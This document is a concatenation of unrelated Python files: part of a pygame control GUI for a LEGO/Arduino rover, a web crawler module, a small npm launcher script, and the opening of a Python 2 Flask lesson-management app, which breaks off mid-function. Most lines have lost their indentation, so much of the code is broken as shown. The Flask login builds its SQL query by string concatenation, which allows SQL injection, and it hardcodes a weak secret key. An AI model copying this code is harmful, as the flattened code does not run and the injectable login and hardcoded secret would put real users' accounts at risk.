data.append(Cmd('get', 'in'))
elif button == 0:
data.append(Cmd('get', 'out'))
return data
def sumd(e1, e2):
return [e1[i] + e2[i] for i in range(len(e1))]
def text_objects(text, font):
textSurface = font.render(text, True, BLACK)
return textSurface, textSurface.get_rect()
class RoboControl:
def __init__(self):
pygame.init()
pygame.key.set_repeat(1, 100)
self.__webFrame = None
self.__cmdTransport = None
self.__joystick = None
self.__screen = None
self.__clock = pygame.time.Clock()
self.__font = pygame.font.SysFont('Arial', 25)
self.__last_ir_value= 0
self.__last_ping_time = 0
self.__last_power_value = 0
frame = pygame.image.load(os.path.join(IMG_FOLDER, 'cam.png'))
self.__camViewFrame = pygame.transform.scale(frame, (100, 100))
self.__gear = 1
def run(self, joystick = Joystick):
self.__initScreen()
#self.__joystick = joystick()
self.__webFrame = WebFrame(GATE_IP, FRAME_PORT)
self.__cmdTransport = CmdTransport(GATE_IP, GATE_PORT, EV3_PORT)
self.__arm1 = 100
cmd = Cmd('Arm1', self.__arm1)
self.__cmdTransport.send(cmd)
        self.__arm2 = 0
        self.__cam = 0
        cmd = Cmd('Arm2', self.__arm2)
        self.__cmdTransport.send(cmd)
self.__gear = 1
cmd = Cmd('gear', '10', EV3_CMD)
self.__cmdTransport.send(cmd)
self.__loop()
def __txtRow(self, render, row):
hrow = 50
self.__screen.blit(render, (TXT_X, FRAME_POS[1] + hrow * (row - 1)))
def __initScreen(self):
self.__screen = pygame.display.set_mode(SCREEN_SIZE)
pygame.display.set_caption('Legowrt v.{}'.format(__version__))
ico = pygame.image.load(os.path.join(IMG_FOLDER, 'icon.jpg'))
pygame.display.set_icon(ico)
self.__bkgnd_img = pygame.image.load(os.path.join(IMG_FOLDER, 'frame.jpg'))
def __dispatchResponse(self):
while not self.__cmdTransport.in_queue.empty():
data = self.__cmdTransport.in_queue.get_nowait()
for raw_cmd in data.split(';'):
cmd = Cmd.parse(raw_cmd)
if cmd.cmd == 'ir':
self.onIR(cmd)
elif cmd.cmd == 'ping':
self.onPing(cmd)
elif cmd.cmd == 'power':
self.onPower(cmd)
def onPing(self, cmd):
self.__last_ping_time = time.time()
def onIR(self, cmd):
self.__last_ir_value = cmd.value
def onPower(self, cmd):
self.__last_power_value = cmd.value
def __handlePing(self):
alive = time.time() - self.__last_ping_time < ALIVE_SEC
txt = 'Brick connection lost'
color = RED if int(time.time()) % 2 == 0 else BLACK
if alive:
txt = 'Brick Connected'
color = LIGHT_GREEN
else:
self.__cmdTransport.reconnectEv3()
self.__last_ir_value = '0'
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=3)
def __handleArm(self):
txt = 'Arm: {}/{}'.format(self.__arm1, self.__arm2)
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=7)
def __handleCam(self):
txt = 'Camera view'
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=4)
def __handleGear(self):
txt = 'Gear: {}'.format(self.__gear)
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=8)
def __handlePower(self):
try:
val = float(self.__last_power_value)
except:
return
ok = val > LOW_POWER
txt = 'Low battery {:.2f}V'.format(val)
color = RED if int(time.time()) % 2 == 0 else BLACK
if ok:
txt = 'Battery {:.2f}V'.format(val)
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=2)
    def __joystickStatus(self):
ok = self.__joystick.isReady()
txt = 'Joystick disconnected'
color = RED
if ok:
txt = 'Joystick ready'
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=4)
def __handleDistance(self):
try:
val = int(self.__last_ir_value)
except:
return
color = LIGHT_GREEN if val > MIN_DISTANCE else RED
dist = int(val / 10) * '='
render = self.__font.render('{} {}>|'.format(val, dist), True, color)
self.__txtRow(render, row=10)
def button(self, msg, x, y, w, h, ic, ac, action = None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if x+w > mouse[0] > x and y+h > mouse[1] > y:
pygame.draw.rect(self.__screen, ac,(x,y,w,h))
if click[0] == 1 and action != None:
action()
else:
pygame.draw.rect(self.__screen, ic,(x,y,w,h))
smallText = pygame.font.SysFont("comicsansms", 20)
textSurf, textRect = text_objects(msg, smallText)
textRect.center = ((x+(w/2)), (y+(h/2)) )
self.__screen.blit(textSurf, textRect)
def camView(self):
frame = pygame.transform.rotate(self.__camViewFrame, self.__cam)
self.__screen.blit(frame, (900, 300))
def closeArm(self):
self.__arm2 = 0
arm2 = Cmd('arm2', self.__arm2, ARDUINO_CMD)
self.__cmdTransport.send(arm2)
self.__arm1 = 180
arm1 = Cmd('arm1', self.__arm1, ARDUINO_CMD)
self.__cmdTransport.send(arm1)
def demo(self):
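        # NOTE: this runs on the UI thread via the Demo button, so the sleeps
        # below block event handling for the duration of the sequence.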
cmd = [Cmd('speak', 'Hello, I am Curiosity mars rover', EV3_CMD),
Cmd('speak', 'Drive forward', EV3_CMD),
Cmd('drive', '0.3,0.3', EV3_CMD),
Cmd('speak', 'Drive backward', EV3_CMD),
Cmd('drive', '-0.3,-0.3', EV3_CMD),
Cmd('speak', 'Stop', EV3_CMD),
Cmd('drive', '0,0', EV3_CMD),
Cmd('speak', 'Left', EV3_CMD),
Cmd('turn', '-30', ARDUINO_CMD),
Cmd('speak', 'Right', EV3_CMD),
Cmd('turn', '30', ARDUINO_CMD),
Cmd('speak', 'Forward', EV3_CMD),
Cmd('turn', '0', ARDUINO_CMD),
Cmd('speak', 'Laser on', EV3_CMD),
Cmd('laser', '1', ARDUINO_CMD),
Cmd('speak', 'Laser off', EV3_CMD),
Cmd('laser', '0', ARDUINO_CMD),
Cmd('speak', 'Hand close', EV3_CMD),
Cmd('arm1', '170', ARDUINO_CMD),
Cmd('arm2', '5', ARDUINO_CMD),
Cmd('arm1', '90', ARDUINO_CMD),
Cmd('arm2', '160', ARDUINO_CMD),
Cmd('speak', 'Camera left', EV3_CMD),
Cmd('cam', '-45', ARDUINO_CMD),
Cmd('speak', 'Camera right', EV3_CMD),
Cmd('cam', '45', ARDUINO_CMD),
Cmd('speak', 'Camera forward', EV3_CMD),
Cmd('cam', '0', ARDUINO_CMD),
]
for c in cmd:
self.__cmdTransport.send(c)
pygame.display.flip()
time.sleep(2)
#self.__arm2 = 0
#arm2 = Cmd('arm2', self.__arm2, ARDUINO_CMD)
#self.__cmdTransport.send(arm2)
#self.__arm1 = 180
#arm1 = Cmd('arm1', self.__arm1, ARDUINO_CMD)
#self.__cmdTransport.send(arm1)
def shutdownBrick(self):
cmd = Cmd('shutdown', 1, EV3_CMD)
self.__cmdTransport.send(cmd)
def __loop(self):
ctrl = False
while True:
self.__screen.blit(self.__bkgnd_img, (0, 0))
frame = self.__webFrame.getFrame()
self.__screen.blit(frame, FRAME_POS)
self.camView()
self.__handleArm()
self.__handleCam()
self.__dispatchResponse()
self.__handleDistance()
self.__handlePing()
self.__handlePower()
self.__handleGear()
            #self.__joystickStatus()
self.button('Close arm', 790, 100, 100, 30, GREEN, LIGHT_GREEN, self.closeArm)
self.button('Demo', 900, 100, 100, 30, GREEN, LIGHT_GREEN, self.demo)
self.button('Shutdown', 1010, 100, 100, 30, RED, RED, self.shutdownBrick)
if self.__arm1 < 85:
self.__arm1 = 85
if self.__arm1 > 170:
self.__arm1 = 170
if self.__arm2 < 5:
self.__arm2 = 5
if self.__arm2 > 175:
self.__arm2 = 175
if self.__cam < -85:
self.__cam = -85
if self.__cam > 85:
self.__cam = 85
cmd = None
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.__webFrame.stop()
self.__cmdTransport.stop()
sys.exit()
elif event.type == pygame.KEYUP:
if event.key in [pygame.K_LEFT, pygame.K_RIGHT] and \
(not pygame.key.get_mods() & pygame.KMOD_CTRL) and \
(not pygame.key.get_mods() & pygame.KMOD_ALT):
cmd = Cmd('turn', 0, ARDUINO_CMD)
elif event.key == pygame.K_SPACE:
self.__laser = 0
cmd = Cmd('laser', self.__laser, ARDUINO_CMD)
elif event.key == pygame.K_UP:
cmd = Cmd('drive', '0,0', EV3_CMD)
elif event.key == pygame.K_DOWN:
cmd = Cmd('drive', '0,0', EV3_CMD)
elif event.key == pygame.K_1:
self.__gear = 1
cmd = Cmd('gear', '10', EV3_CMD)
elif event.key == pygame.K_2:
self.__gear = 2
cmd = Cmd('gear', '7', EV3_CMD)
elif event.key == pygame.K_3:
self.__gear = 3
cmd = Cmd('gear', '5', EV3_CMD)
elif event.key == pygame.K_4:
self.__gear = 4
cmd = Cmd('gear', '3', EV3_CMD)
elif event.key == pygame.K_5:
self.__gear = 5
cmd = Cmd('gear', '1', EV3_CMD)
elif event.type in [pygame.KEYDOWN]:
if event.key == pygame.K_ESCAPE:
self.__webFrame.stop()
self.__cmdTransport.stop()
sys.exit()
elif event.key == pygame.K_SPACE:
self.__laser = 1
cmd = Cmd('laser', self.__laser, ARDUINO_CMD)
elif pygame.key.get_mods() & pygame.KMOD_CTRL:
if event.key == pygame.K_LEFT:
self.__arm1 -= 5
cmd = Cmd('arm1', self.__arm1, ARDUINO_CMD)
elif event.key == pygame.K_RIGHT:
self.__arm1 += 5
cmd = Cmd('arm1', self.__arm1, ARDUINO_CMD)
elif event.key == pygame.K_UP:
self.__arm2 -= 5
cmd = Cmd('arm2', self.__arm2, ARDUINO_CMD)
elif event.key == pygame.K_DOWN:
self.__arm2 += 5
cmd = Cmd('arm2', self.__arm2, ARDUINO_CMD)
elif pygame.key.get_mods() & pygame.KMOD_ALT:
if event.key == pygame.K_LEFT:
self.__cam += 5
cmd = Cmd('cam', self.__cam, ARDUINO_CMD)
elif event.key == pygame.K_RIGHT:
self.__cam -= 5
cmd = Cmd('cam', self.__cam, ARDUINO_CMD)
else:
if event.key == pygame.K_LEFT:
cmd = Cmd('turn', -30, ARDUINO_CMD)
if event.key == pygame.K_RIGHT:
cmd = Cmd('turn', 30, ARDUINO_CMD)
if event.key == pygame.K_UP:
cmd = Cmd('drive', '0.3,0.3', EV3_CMD)
if event.key == pygame.K_DOWN:
cmd = Cmd('drive', '-0.3,-0.3', EV3_CMD)
if cmd is not None:
self.__cmdTransport.send(cmd)
#data = self.__joystick.read()
#for cmd in data:
# self.__cmdTransport.send(cmd)
pygame.display.flip()
self.__clock.tick(60)
if __name__ == '__main__':
import sys
c = RoboControl()
class JoystickTest:
def __init__(self):
pass
def isReady(self):
return True
def read(self):
return [Cmd('test', 'test')]
c.run(JoystickTest)
|
core.py
|
import os
import time
import queue
import re
import threading
import copy
import csv
import multiprocessing
from collections import OrderedDict
from os import path
from urllib.parse import urlparse
from urllib import robotparser
import requests
import lxml.html
from bs4 import BeautifulSoup
from .helpers import color_logging
from .url_queue import UrlQueue
from . import helpers
def parse_seeds(seeds):
""" parse website seeds.
@params
seeds example:
- url1
- user1:pwd1@url1
- user1:pwd1@url1|url2|user3:pwd3@url3
"""
seeds = seeds.strip().split('|')
website_list = []
for seed in seeds:
if '@' not in seed:
website = {
'url': seed,
'auth': None
}
else:
user_pwd, url = seed.split('@')
username, password = user_pwd.split(':')
website = {
'url': url,
'auth': (username, password)
}
website_list.append(website)
return website_list
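# A doctest-style sketch of parse_seeds (follows the docstring above):
#
#   >>> parse_seeds('http://a.example')
#   [{'url': 'http://a.example', 'auth': None}]
#   >>> parse_seeds('bob:secret@http://b.example')
#   [{'url': 'http://b.example', 'auth': ('bob', 'secret')}]
#
# Multiple seeds are separated by '|', each optionally carrying its own
# user:pwd@ prefix.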
class WebCrawler(object):
def __init__(self, seeds, include_hosts, logs_folder, config_file=None, respect_robots=True):
self.website_list = parse_seeds(seeds)
self.include_hosts_set = set(include_hosts)
self.test_counter = 0
self.url_queue = UrlQueue()
self.cookie_str = ''
self.auth_dict = {}
self.logs_folder = logs_folder
for website in self.website_list:
website_url = website['url']
host = helpers.get_parsed_object_from_url(website_url).netloc
self.include_hosts_set.add(host)
if website['auth']:
self.auth_dict[host] = website['auth']
self.load_config(config_file)
self.categorised_urls = {}
self.web_urls_mapping = {}
self.bad_urls_mapping = {}
self.current_depth_unvisited_urls_queue = queue.Queue()
        # Set up the robots.txt parser; use the first seed's URL as the base
        # (the raw seeds string may contain auth info and multiple URLs).
        try:
            self.respect_robots = respect_robots
            self.rp = robotparser.RobotFileParser()
            self.rp.set_url(self.website_list[0]['url'].rstrip('/') + "/robots.txt")
            self.rp.read()
        except (IOError, IndexError):
            self.respect_robots = False
def reset_all(self):
self.current_depth = 0
self.current_depth_unvisited_urls_queue.queue.clear()
self.url_queue.clear_unvisited_urls()
for website in self.website_list:
website_url = website['url']
self.url_queue.remove_visited_url(website_url)
self.url_queue.add_unvisited_url(website_url)
def load_config(self, config_file):
if config_file:
if not os.path.isabs(config_file):
config_file = os.path.join(os.getcwd(), config_file)
else:
config_file = os.path.join(os.path.dirname(__file__), 'default_config.yml')
config_dict = helpers.load_yaml_file(config_file)
self.kwargs = {
'headers': config_dict.get('headers', {}),
'cookies': {}
}
self.url_type_config = config_dict.get('Content-Type', {})
self.user_agent = self.kwargs["headers"].get('User-Agent', {})
self.kwargs['timeout'] = config_dict.get('default_timeout', 20)
whitelist_configs = config_dict.get('whitelist', {})
self.whitelist_host = whitelist_configs.get('host', [])
self.whitelist_fullurls = whitelist_configs.get('fullurl', [])
self.whitelist_include_keys = whitelist_configs.get('include-key', [])
self.whitelist_startswith_strs = whitelist_configs.get('startswith', [])
self.grey_env = False
def set_grey_env(self, user_agent, traceid, view_grey):
self.kwargs['headers']['User-Agent'] = user_agent
self.kwargs['cookies']['traceid'] = traceid
self.kwargs['cookies']['view_grey'] = view_grey
self.grey_env = True
self.grey_user_agent = user_agent
def get_user_agent_by_url(self, url):
if '//m.' in url:
# e.g. http://m.debugtalk.com
return self.user_agent['mobile']
else:
return self.user_agent['www']
def parse_url(self, url, referer_url):
url = url.strip()
if url == "":
return None
for ignore_url_startswith_str in self.whitelist_startswith_strs:
if url.startswith(ignore_url_startswith_str):
return None
if url.startswith('\\"'):
# \\"https:\\/\\/store.debugtalk.com\\/guides\\/"
url = url.encode('utf-8').decode('unicode_escape')\
.replace(r'\/', r'/').replace(r'"', r'')
return url
parsed_url = helpers.make_url_with_referer(url, referer_url)
return parsed_url
def get_url_type(self, resp, req_host):
if req_host not in self.include_hosts_set:
url_type = 'external'
return url_type
content_type = resp.headers.get('Content-Type', None)
if content_type and content_type in self.url_type_config.get('static', []):
url_type = 'static'
else:
url_type = 'recursive'
return url_type
def parse_urls(self, urls_set, referer_url):
parsed_urls_set = set()
for url in urls_set:
parsed_url = self.parse_url(url, referer_url)
if parsed_url is None:
continue
parsed_urls_set.add(parsed_url)
return parsed_urls_set
def parse_page_links(self, referer_url, content):
""" parse a web pages and get all hyper links.
"""
raw_links_set = set()
try:
etree = lxml.html.fromstring(content)
except lxml.etree.ParserError:
return raw_links_set
link_elements_list = etree.xpath("//link|//a|//script|//img")
for link in link_elements_list:
url = link.get('href') or link.get('src')
if url is None:
continue
raw_links_set.add(url)
parsed_urls_set = self.parse_urls(raw_links_set, referer_url)
return parsed_urls_set
def save_categorised_url(self, status_code, url):
""" save url by status_code category
"""
if status_code not in self.categorised_urls:
self.categorised_urls[status_code] = set()
self.categorised_urls[status_code].add(url)
def _print_log(self, depth, url, status_code, duration_time):
self.test_counter += 1
color_logging(
"test_counter: {}, depth: {}, url: {}, cookie: {}, status_code: {}, duration_time: {}s"
.format(self.test_counter, depth, url, self.cookie_str, status_code, round(duration_time, 3)), 'DEBUG')
def is_url_has_whitelist_key(self, url):
for key in self.whitelist_include_keys:
if key in url:
return True
return False
def get_hyper_links(self, url, depth, retry_times=3):
if url in self.whitelist_fullurls:
return set()
hyper_links_set = set()
kwargs = copy.deepcopy(self.kwargs)
if not self.grey_env:
kwargs['headers']['User-Agent'] = self.get_user_agent_by_url(url)
parsed_object = helpers.get_parsed_object_from_url(url)
url_host = parsed_object.netloc
if url_host in self.whitelist_host:
return set()
if self.is_url_has_whitelist_key(url):
return set()
if url_host in self.auth_dict and self.auth_dict[url_host]:
kwargs['auth'] = self.auth_dict[url_host]
exception_str = ""
status_code = '0'
resp_content_md5 = None
duration_time = 0
try:
start_time = time.time()
resp = requests.head(url, **kwargs)
url_type = self.get_url_type(resp, url_host)
""" If this is not a html page of the domain, do not download it.
"""
if url_type in ['static', 'external']:
if resp.status_code in [301, 302, 404, 500]:
# some links can not be visited with HEAD method and will return 404 status code
# so we recheck with GET method here.
start_time = time.time()
resp = requests.get(url, **kwargs)
duration_time = time.time() - start_time
status_code = str(resp.status_code)
else:
# recursive
start_time = time.time()
resp = requests.get(url, **kwargs)
duration_time = time.time() - start_time
resp_content_md5 = helpers.get_md5(resp.content)
hyper_links_set = self.parse_page_links(resp.url, resp.content)
if url not in self.web_urls_mapping:
self.web_urls_mapping[url] = list(hyper_links_set)
status_code = str(resp.status_code)
self.url_queue.add_unvisited_urls(hyper_links_set)
if resp.status_code > 400:
exception_str = 'HTTP Status Code is {}.'.format(status_code)
"""Add scraping here.
"""
self.scrape_request(resp.content, url);
except requests.exceptions.SSLError as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'SSLError'
retry_times = 0
except requests.exceptions.ConnectionError as ex:
color_logging("ConnectionError {}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'ConnectionError'
except requests.exceptions.Timeout:
time_out = kwargs['timeout']
color_logging("Timeout {}: Timed out for {} seconds".format(url, time_out), 'WARNING')
exception_str = "Timed out for {} seconds".format(time_out)
status_code = 'Timeout'
except requests.exceptions.InvalidSchema as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'InvalidSchema'
retry_times = 0
except requests.exceptions.ChunkedEncodingError as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'ChunkedEncodingError'
retry_times = 0
except requests.exceptions.InvalidURL as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'InvalidURL'
retry_times = 0
except lxml.etree.XMLSyntaxError as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'XMLSyntaxError'
retry_times = 0
self._print_log(depth, url, status_code, duration_time)
if retry_times > 0:
if not status_code.isdigit() or int(status_code) > 400:
time.sleep((4-retry_times)*2)
return self.get_hyper_links(url, depth, retry_times-1)
else:
self.bad_urls_mapping[url] = exception_str
self.save_categorised_url(status_code, url)
url_test_res = {
'status_code': status_code,
'duration_time': duration_time,
'md5': resp_content_md5
}
self.url_queue.add_visited_url(url, url_test_res)
return hyper_links_set
def get_referer_urls_set(self, url):
""" get all referer urls of the specified url.
"""
referer_set = set()
for parent_url, hyper_links_set in self.web_urls_mapping.items():
if url in hyper_links_set:
referer_set.add(parent_url)
return referer_set
def get_sorted_categorised_urls(self):
return OrderedDict(
sorted(self.categorised_urls.items(), reverse=True)
).items()
def print_categorised_urls(self):
        '''
        Print error URLs grouped into blocks by HTTP status code; within each
        block, URLs are grouped by host. The listed URLs are the pages whose
        content contains the error links, not the error links themselves.
        '''
def _print(status_code, urls_list, log_level, show_referer=False):
if isinstance(status_code, str):
output = "{}: {}.\n".format(status_code, len(urls_list))
elif isinstance(status_code, int):
output = "HTTP status code {}, total: {}.\n".format(status_code, len(urls_list))
host_dict = {}
for url in urls_list:
referer_url_list = list(self.get_referer_urls_set(url))
                if referer_url_list:
host_url = referer_url_list[0].split("/")[2]
else:
host_url = "root"
                # Build {host: [url_list]}
                host_dict.setdefault(host_url, []).append(url)
output += "urls list: \n"
for host in host_dict:
output += "---HOST: " + host + "\n"
for url in host_dict[host]:
output += url
                    if not str(status_code).isdigit():
                        output += ", {}: {}".format(status_code, self.bad_urls_mapping[url])
if show_referer:
# only show 5 referers if referer urls number is greater than 5
referer_urls = self.get_referer_urls_set(url)
referer_urls_num = len(referer_urls)
if referer_urls_num > 5:
referer_urls = list(referer_urls)[:5]
output += ", referer_urls: {}".format(referer_urls)
output += " total {}, displayed 5.".format(referer_urls_num)
else:
output += ", referer_urls: {}".format(referer_urls)
output += '\n'
color_logging(output, log_level)
        for status_code, urls_list in self.get_sorted_categorised_urls():
            color_logging('-' * 120)
            if status_code.isdigit():
                status_code = int(status_code)
                if status_code >= 400:
                    _print(status_code, urls_list, 'ERROR', True)
                elif status_code >= 300:
                    _print(status_code, urls_list, 'WARNING')
                else:
                    # 2xx responses are informational
                    _print(status_code, urls_list, 'INFO')
            else:
                # non-numeric codes ('Timeout', 'SSLError', ...) are errors
                _print(status_code, urls_list, 'ERROR', True)
def run_dfs(self, max_depth):
""" start to run test in DFS mode.
"""
def crawler(url, depth):
""" DFS crawler
"""
if depth > max_depth:
return
if self.url_queue.is_url_visited(url):
urls = set()
else:
urls = self.get_hyper_links(url, depth)
for url in urls:
crawler(url, depth+1)
while not self.url_queue.is_unvisited_urls_empty():
url = self.url_queue.get_one_unvisited_url()
crawler(url, self.current_depth)
def run_bfs(self, max_depth):
""" start to run test in BFS mode.
"""
while self.current_depth <= max_depth:
while not self.url_queue.is_unvisited_urls_empty():
url = self.url_queue.get_one_unvisited_url()
self.current_depth_unvisited_urls_queue.put_nowait(url)
self.current_depth_unvisited_urls_queue.join()
self.current_depth += 1
def visit_url(self):
while True:
try:
url = self.current_depth_unvisited_urls_queue.get()
""" Have the url, les do the action over this.
Decorator with the features? Or only process args? Anyway apply the advances scraping tech.
"""
if self.respect_robots and self.rp.can_fetch(self.get_user_agent_by_url(url), url):
self.get_hyper_links(url, self.current_depth)
finally:
self.current_depth_unvisited_urls_queue.task_done()
def create_threads(self, concurrency):
for _ in range(concurrency):
thread = threading.Thread(target=self.visit_url)
thread.daemon = True
thread.start()
    def start(self, cookies=None, crawl_mode='BFS', max_depth=10, concurrency=None):
        """ start to run test in specified crawl_mode.
        @params
        crawl_mode = 'BFS' or 'DFS'
        """
        cookies = cookies or {}
        concurrency = int(concurrency or multiprocessing.cpu_count() * 4)
info = "Start to run test in {} mode, cookies: {}, max_depth: {}, concurrency: {}, respect_robots: {}"\
.format(crawl_mode, cookies, max_depth, concurrency, self.respect_robots)
color_logging(info)
self.reset_all()
self.create_threads(concurrency)
self.kwargs['cookies'].update(cookies)
self.cookie_str = '_'.join(['_'.join([key, cookies[key]]) for key in cookies])
if crawl_mode.upper() == 'BFS':
self.run_bfs(max_depth)
else:
self.run_dfs(max_depth)
color_logging('=' * 120, color='yellow')
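    # A minimal usage sketch (hypothetical seed and logs folder; UrlQueue and
    # the YAML config come from the package as above):
    #
    #   crawler = WebCrawler('http://example.com', [], '/tmp/logs')
    #   crawler.start(crawl_mode='BFS', max_depth=2, concurrency=8)
    #   crawler.print_result(save_results=True)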
def print_result(self, canceled=False, save_results=False):
status = "Canceled" if canceled else "Finished"
color_logging("{}. The crawler has tested {} urls."\
.format(status, self.url_queue.get_visited_urls_count()))
self.print_categorised_urls()
if save_results:
urls_mapping_log_path = os.path.join(self.logs_folder, 'urls_mapping.yml')
helpers.save_to_yaml(self.web_urls_mapping, urls_mapping_log_path)
color_logging("Save urls mapping in YAML file: {}".format(urls_mapping_log_path))
visited_urls_log_path = os.path.join(self.logs_folder, 'visited_urls.yml')
helpers.save_to_yaml(self.url_queue.get_visited_urls(), visited_urls_log_path)
color_logging("Save visited urls in YAML file: {}".format(visited_urls_log_path))
def get_mail_content_ordered_dict(self):
website_urls = [website['url'] for website in self.website_list]
mail_content_ordered_dict = OrderedDict({
"Tested websites": ','.join(website_urls),
"Total tested urls number": self.url_queue.get_visited_urls_count(),
"===== Detailed": "Statistics ====="
})
flag_code = 0
for status_code, urls_list in self.get_sorted_categorised_urls():
if status_code.isdigit():
mail_content_ordered_dict["status code {}".format(status_code)] = len(urls_list)
if int(status_code) > 400:
flag_code = 1
else:
mail_content_ordered_dict[status_code] = len(urls_list)
flag_code = 1
return mail_content_ordered_dict, flag_code
|
scriptrun.py
|
import os
import sh
import time
import threading
def invokenpm():
os.system("sudo npm start")
def invokeBrowser():
os.system("google-chrome http://localhost:8081/index.html")
t2 = threading.Thread(target=invokeBrowser, args=())
t2.start()
enter_view = int(input("view number: "))
if enter_view == 1:
sh.cd('/home/upadhyatejas/Hackday/Index')
print(sh.pwd())
t1 = threading.Thread(target=invokenpm, args=())
t1.start()
elif enter_view == 2:
sh.cd('/home/upadhyatejas/Hackday/Lesson-Information')
print(sh.pwd())
t1 = threading.Thread(target=invokenpm, args=())
t1.start()
else:
sh.cd('/home/upadhyatejas/Hackday/Quiz')
t1 = threading.Thread(target=invokenpm, args=())
t1.start()
print("done with excecution")
|
client.py
|
import os
import re
import ast
import sys
import json
import uuid
import MySQLdb
import functools
import threading
import subprocess
import unicodedata
import flask, flask.views
app = flask.Flask(__name__)
# Don't do this!
app.secret_key = "bacon"
#get app directory
loc = os.getcwd()+"/"
#variables for registry
registry = ""
regmail = ""
reguser = ""
regpas = ""
#variables for databse access
dbhost = ""
dbuser = ""
dbpasswd = ""
#read config.txt file
with open(loc+"static/configs/config.txt") as f:
details = f.read()
f.close()
for line in details.splitlines():
line = line.split()
if line == []:
pass
elif line[0] == "registry":
registry = line[2]
elif line[0] == "regmail":
regmail = line[2]
elif line[0] == "reguser":
reguser = line[2]
elif line[0] == "regmail":
regmail = line[2]
elif line[0] == "regpas":
regpas = line[2]
elif line[0] == "dbhost":
dbhost = line[2]
elif line[0] == "dbuser":
dbuser = line[2]
elif line[0] == "dbpasswd":
dbpasswd = line[2]
grps = []
radio1 = ''
radio2 = ''
search1 = ''
search2 = ''
dld = []
dld_lsn = []
output = []
def executer(cmd):
p = subprocess.Popen(cmd, stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out, err = p.communicate()
return out, err
def thread_executer(cmd):
global dld
print "in thread",cmd
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out, err = p.communicate()
temp=out.splitlines()[-2].split()[0]
if temp=='Digest:':
dld.remove(cmd[-1])
def downloader(cmd,image,info):
global dld,loc
dld.append(image)
print "Downloading ",image
out,err = executer(cmd)
print "finished dld ",image
if 'Digest' in out:
try:
cmd = ['docker','tag',cmd[2],image]
out,err = executer(cmd)
try:
print loc+"static/lessons/"+image.replace('/','-')
with open(loc+"static/lessons/"+image.replace('/','-'),'w') as f:
f.write(info[0]+"\n"+info[1])
f.close()
except:
print "error writing file -",image
except:
print "error renaming ",image
else:
print "failed downloading",image
while image in dld : dld.remove(image)
print "exiting ",image
def add_lesson(old_lesn,lesn,index,line,info):
global dld,loc
global dld_lsn
flag = 1
print "enter loop - add_lesson"
while flag:
flag = 0
for item in index:
if item in dld:
flag = 1
print "exit loop - add_lesson"
dld_lsn.remove(old_lesn)
target = loc+'static/configs/lesson.txt'
try:
cmd=['grep','^'+lesn+' ',target]
val,err = executer(cmd)
#add or replace line in the configs/lesson.txt file
if val:
print "Replacing line"
cmd=['sed','-i','/^'+lesn+' /c '+line,target]
val = executer(cmd)
else:
print "Adding line"
with open(target, 'a') as f:
f.write(line)
f.close()
#add description about lesson in the static/lessons/ folder
with open(loc+'static/lessons/'+lesn,'w') as f:
f.write(info[0]+'\n'+info[1])
f.close()
except:
print "error writing file",lesn
def thread_executer_2(cmd,args):
global dld
print "in thread",cmd
if args[0] == 'play':
try:
f = open(cmd[2],'w')
f.write(args[1])
f.close()
f = open(cmd[3],'w')
f.write(args[2])
f.close()
except:
print "Error creating playbook ",cmd
p = subprocess.Popen(cmd,shell=False,stdin=None,stdout=None,stderr=None,close_fds=True)
print "out of process",cmd
def reader(fname):
index=[]
try:
with open(fname) as f:
index = f.read().splitlines()
f.close()
except:
pass
return index
def db_ops(cmds,arg):
global dbuser, dbpasswd, dbhost
db = MySQLdb.connect(host=dbhost,
user=dbuser,
passwd=dbpasswd,
db="lense")
cur = db.cursor()
for cmd in cmds:
cur.execute(cmd)
result = cur.fetchall()
#commit if arg = 1
if arg == 1:
db.commit()
    db.close()
    #return the results
    return result
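# A minimal usage sketch for db_ops (hypothetical table and values): pass a
# list of SQL strings, with arg=1 to commit writes and arg=0 for reads.
#
#   rows = db_ops(["SELECT uname FROM users"], 0)
#   db_ops(["INSERT INTO users (uname, passwd) VALUES ('a', 'b')"], 1)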
def filechecker():
    #check and create lesson.txt if it does not exist already
    path="static/configs/lesson.txt"
    if not os.path.exists(path):
        print "creating", path
        fh = open(path, "w")
        fh.write(' ')
        fh.close()
class Main(flask.views.MethodView):
def get(self):
return flask.render_template('index.html')
def post(self):
flag = []
if 'logout' in flask.request.form:
flask.session.pop('username', None)
return flask.redirect(flask.url_for('index'))
required = ['username', 'passwd']
for r in required:
if r not in flask.request.form:
flask.flash("Error: {0} is required.".format(r))
return flask.redirect(flask.url_for('index'))
username = flask.request.form['username']
passwd = flask.request.form['passwd']
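        # NOTE: building SQL by string concatenation as below is vulnerable to
        # SQL injection; a real deployment should use parameterized queries
        # (e.g. cur.execute(sql, (passwd, username))).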
cmd = "SELECT * FROM users WHERE passwd='"+passwd+"' AND uname='"+username+"'"
flag=db_ops([cmd],0)
#flag = 1
#check if all files are available
filechecker()
#if username in users and users[username] == passwd:
if flag:
flask.session['username'] = username
with open('/tmp/.esnel','w') as f:
f.write(username)
f.close()
else:
flask.flash("Username doesn't exist or incorrect password")
return flask.redirect(flask.url_for('home'))
def login_required(method):
@functools.wraps(method)
def wrapper(*args, **kwargs):
if 'username' in flask.session:
return method(*args, **kwargs)
else:
flask.flash("A login is required to proceed!")
return flask.redirect(flask.url_for('index'))
return wrapper
class Repo(flask.views.MethodView):
@login_required
def get(self):
global dld_lsn
global dld
global registry,regmail,reguser,regpas
#dld=['lesson3']
